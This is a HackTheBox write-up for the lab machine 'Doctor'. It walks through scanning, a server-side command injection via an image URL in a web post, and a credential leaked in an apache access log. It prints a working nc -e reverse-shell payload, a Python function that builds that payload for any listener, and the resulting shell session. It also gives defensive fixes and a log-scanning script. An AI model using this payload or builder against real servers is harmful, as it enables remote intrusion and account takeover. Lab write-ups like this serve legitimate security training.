# Doctor 10.10.10.209

![Got User on 5 Jan 2020](https://lh3.googleusercontent.com/pzhaGTrWNrhIzeuN033vuw_Xfr6kz2bU6eKC5nYi22JKGBLyRXBsmbvjOolG2h75W3nw2IkQra9kzoH1k4L_P0lr-zgvlTfUEn3z4_cHuh3qKDwAFYB6cEfMc7eWjdosWTcBee_L)

## **Background**

**Doctor** is a Linux machine from [HackTheBox](https://www.hackthebox.eu/home/machines/profile/278). It hosts a web application whose post form passes attacker-controlled input to a shell on the server (this write-up refers to it as an XSS, but the payload executes server-side, not in a browser). The initial foothold was obtained by submitting a post containing a reverse-shell payload. A password-reset request for the user *shaun* was then found in the web server log, which gave access to the user flag.

<130n@calvinlai.com>

**Target Machine**: 10.10.10.209

**Attacker Machine**: 10.10.14.16

## **Hacking Process Part 0 – Service Scanning** <a href="#hacking-process-part-0-service-scanning" id="hacking-process-part-0-service-scanning"></a>

### **Quick Pre-searching** <a href="#quick-pre-searching" id="quick-pre-searching"></a>

![nmap -p- -T5 --min-rate=1000 10.10.10.209 -oG fkclai.nmap](https://lh5.googleusercontent.com/hTN6T4juA3z1wE1ST6WkbfQNQS03ESqkoCESJJrhKPvFYbI2ai0yhG8C98CTB5ri3hC0_ae4txjuHkFRJhp4qcNMR1WzNLjQTpJIexr1m8OIG2jwHcF3pnPogEpgbuRf75UBcwny)

### **Detailed Analysis**

![nmap -p $(grep -Eo '\[0-9\]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.209 -o nmap-result.txt](https://lh5.googleusercontent.com/DwOGaZHyOzkXHa4NAgTY4TrSvxjtH2BG-HXfUGvnoas0qH0RRhNmZnrlTbxQ0Aunzki0JtOBV1JNeq-EKZZ4idLv07BuIU50LpmgxxsUBDQQoJpUP1D9KpLY_4Scdf1brEBlai4Z)

### **Enumeration strategies**

1. **Check website vulnerability**
2. **Check any hidden files/folders of the website**
3. **Check the website**

## **Hacking Process Part 1 – Enumeration** <a href="#hacking-process-part-1-enumeration" id="hacking-process-part-1-enumeration"></a>

Visiting the website and reading the page source showed that the host name doctors.htb has to be added to the hosts file (/etc/hosts on the attacker machine) before further enumeration.

![](https://lh6.googleusercontent.com/2Ms6ZbEP7KAD_QfsPzM6Q20fN-uWenIQHm77__FEkJ0Fsif39osWjzvBOzMGsKIe5NvuTYBKnKxJhX7lYL4xlydyBdypRFFS5yDPzcSJbhM_Wq4xkVrwr-PlNOmyxYkMW45jzUfy)

A login page was found at <http://doctors.htb>.

![](https://lh3.googleusercontent.com/JnPU7-jfpvX5cibQ4kXZDHr4hBi05O0xUuwZHa-DeHvjNNlcQi9ncTDyc-fWMWeDgUj37mo9m1AZTFtzoMTcBeGuNS6RqdpUUc03lcWRDzYtuBMlKzOJXbA8RLzlYiB92Zabgjoy)

gobuster and dirb were tried to find further hidden folders, but the result was negative. Nikto did not report anything useful either.

Finally, a user account was registered in order to enumerate the authenticated part of the site. The form for posting a message accepts HTML unfiltered, which is why this write-up calls it an XSS. What actually gives the foothold, though, is that an image URL placed in a post is handed to a shell on the server, so a `$(...)` command substitution inside the URL executes there: the reverse shell below connects back from 10.10.10.209 itself, not from a victim's browser.

![](https://lh4.googleusercontent.com/qUNXOrqLCofLB0I43Toy8pLvW-beuRuZy-Z-NkwFoVY9TNmWLq9WuDD2GED_2W5s7KziI_vAdo_ex1Pjwvezm-dTmIOn1MoW0TJaTNybGyD37Uir6kUKAfC4rD1l0qlhR7wRmij8)

After several tries, this payload was used to get the reverse shell. `$IFS` replaces the spaces (a space would end the URL), and the single quotes after each `$IFS` stop the shell from reading the following digits as part of the variable name. The listener address is the attacker machine, 10.10.14.16, on port 6666.

```
<img src=http://10.10.14.16:8888/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.16'$IFS'6666')>
```
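The payload only works because the server passes the post's image URL to a shell. The following is an added example, not code from the write-up or from the box: it builds the same space-free payload for a given listener and, using `echo fetching` as a stand-in for whatever fetcher the server really runs (an assumption), shows that a `shell=True` invocation expands the `$(...)` and `$IFS` while an argv-list invocation passes the URL through as one literal argument. The post body, the URL regex and the harmless `$(echo$IFS'injected')` marker are constructed for the demonstration.

```python
import re
import subprocess

# Constructed post body for the demonstration: same shape as the page's
# payload, but the command substitution only echoes a marker instead of
# spawning nc, so the example runs harmlessly offline.
POST_BODY = "<img src=http://10.10.14.16:8888/$(echo$IFS'injected')>"

# Assumption: the server pulls http(s):// URLs out of the post text before
# fetching them. Stop at whitespace or '>' so the whole src value is captured.
URL_RE = re.compile(r"https?://[^\s>]+")


def build_payload(attacker_ip: str, port: int) -> str:
    """Build the write-up's reverse-shell payload for a given listener.

    $IFS stands in for spaces; the single quotes after $IFS stop the shell
    from reading the following digits as part of the variable name
    ($IFS10... would be an empty, unrelated variable).
    """
    return (
        f"<img src=http://{attacker_ip}:8888/"
        f"$(nc.traditional$IFS-e$IFS/bin/bash$IFS'{attacker_ip}'$IFS'{port}')>"
    )


def extract_urls(body: str) -> list:
    """Return every URL in a post body, the way a naive server-side fetcher would."""
    return URL_RE.findall(body)


def vulnerable_fetch(url: str) -> str:
    """Server-side pattern that gives the box its foothold: the URL is
    interpolated into a command string run through /bin/sh, so $(...) and
    $IFS are expanded before the 'fetcher' ever sees the URL.
    'echo fetching' stands in for the real curl/wget call (assumption)."""
    result = subprocess.run(
        f"echo fetching {url}", shell=True, capture_output=True, text=True
    )
    return result.stdout.strip()


def safe_fetch(url: str) -> str:
    """Hardened form: argv list, no shell. The URL reaches the program as
    one literal argument; nothing inside it is expanded."""
    result = subprocess.run(
        ["echo", "fetching", url], capture_output=True, text=True
    )
    return result.stdout.strip()


if __name__ == "__main__":
    print(build_payload("10.10.14.16", 6666))
    for url in extract_urls(POST_BODY):
        print("shell=True :", vulnerable_fetch(url))
        print("argv list  :", safe_fetch(url))
```

Run it and the `shell=True` line prints `fetching http://10.10.14.16:8888/injected`, i.e. the substitution ran, whereas the argv-list line prints the URL exactly as posted. The fix on the server side is the second form: never build a command string from user input, and validate the URL scheme and host before fetching at all.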

![](https://lh3.googleusercontent.com/KU4ZtplrKVLQoBtSkljjhluWvBbsTi75QVdiSSx_oNjIJ-UtVPCR9cPFkNDx0UJf3QVFUY3Ig1wf2uxxzHGYejd4Yg5ke_T3OsPFCSNdQe2-XPZeBkSD1gMfqCf_3zbiEi6jcntC)

```
root@fkclai:~/Documents/ctf/htb/linux/19-HTB-doctor# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.209] 38714
whoami
web
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@doctor:~$
web@doctor:~$ cd /home/
web@doctor:/home$ ls
shaun web
web@doctor:/home$ cd shaun/
web@doctor:/home/shaun$ ls
user.txt
web@doctor:/home/shaun$ cat user.txt
cat: user.txt: Permission denied
web@doctor:/home/shaun$
```

## **Hacking Process Part 2 – Gaining Foothold**

The user flag sits in the home directory of *shaun*, so enumeration focused on that account. Reading the apache2 logs turned up a password-reset request for *shaun* in the access.log: the new password had been sent as a URL parameter, and the web server records the full request line, query string included, in a log that the low-privileged `web` user could read. The password of *shaun* is `Guitar123`.

![](https://lh3.googleusercontent.com/AE8xnPQBY9JKhQy5tRZ2L0tOq3CmLiBqdQI65R8SfpRzwXIy4iqHY1qMfVXbZnBlTBaeKAmbyTejZgeqmn8OFHErw1SXbtjnfyBcwRx610bx7tNEU-zcD-Ifq6LPDjcuQFnZINVz)
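The leak above is a general pattern worth checking for on every box and in every log review: whatever travels in a query string ends up in the access log, readable by anyone who can read the log. The following is an added example, not from the write-up, of the triage a practitioner would run over such a log: it parses Apache combined-format lines and flags requests whose query string carries a credential-looking parameter. The log lines, timestamps, the `/reset` path and the `email` parameter are constructed for the demonstration; only the `shaun`/`Guitar123` pair is the one the write-up reports.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined log format (not the real log
# from the box). The second line models the password-reset request the
# write-up found; the others are ordinary noise a real log would contain.
SAMPLE_LOG = """\
10.10.14.16 - - [05/Jan/2021:10:12:01 +0000] "GET /login HTTP/1.1" 200 1425 "-" "Mozilla/5.0"
10.10.14.16 - - [05/Jan/2021:10:12:44 +0000] "GET /reset?email=shaun&password=Guitar123 HTTP/1.1" 200 212 "-" "Mozilla/5.0"
10.10.14.16 - - [05/Jan/2021:10:13:02 +0000] "POST /login HTTP/1.1" 302 0 "http://doctors.htb/login" "Mozilla/5.0"
10.10.14.16 - - [05/Jan/2021:10:13:30 +0000] "GET /home?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client, timestamp, method, request target and status of a combined-format line.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Parameter names that should never travel in a URL (compared case-insensitively).
SENSITIVE = {"password", "passwd", "pwd", "pass", "token", "secret", "api_key", "apikey"}


def find_leaked_credentials(log_text: str) -> list:
    """Return (client, timestamp, path, param, value) for every request whose
    query string carries a sensitive-looking parameter. Values are URL-decoded
    by parse_qsl, so %40 and friends come back as the characters the user typed."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on it
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() in SENSITIVE:
                findings.append((m.group("client"), m.group("ts"), parts.path, key, value))
    return findings


if __name__ == "__main__":
    for client, ts, path, key, value in find_leaked_credentials(SAMPLE_LOG):
        print(f"{ts} {client} {path} {key}={value}")
```

Only GET parameters are visible this way; a POST body is not logged by default, which is exactly why a reset form should submit the new password in the body over HTTPS rather than in the URL. The same scan is useful defensively, run over your own logs, to catch applications that leak credentials into them.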

Switching to this account with `su shaun` and that password, the user flag could be read.

<div align="left"><img src="https://lh3.googleusercontent.com/t5D-Gd1SfA9eck_z_GhfJ5cyKHr4i5w83dr7RU7G3uVGm_Q4An45J9jeWATJaF-O1UF7rBnph2Ih6Oi5QazQm0tGJ6cty7Hw7gUbcKzCFyUB3g8iLUzKwPM8LEFzNuBMqJaqEhFb" alt=""></div>
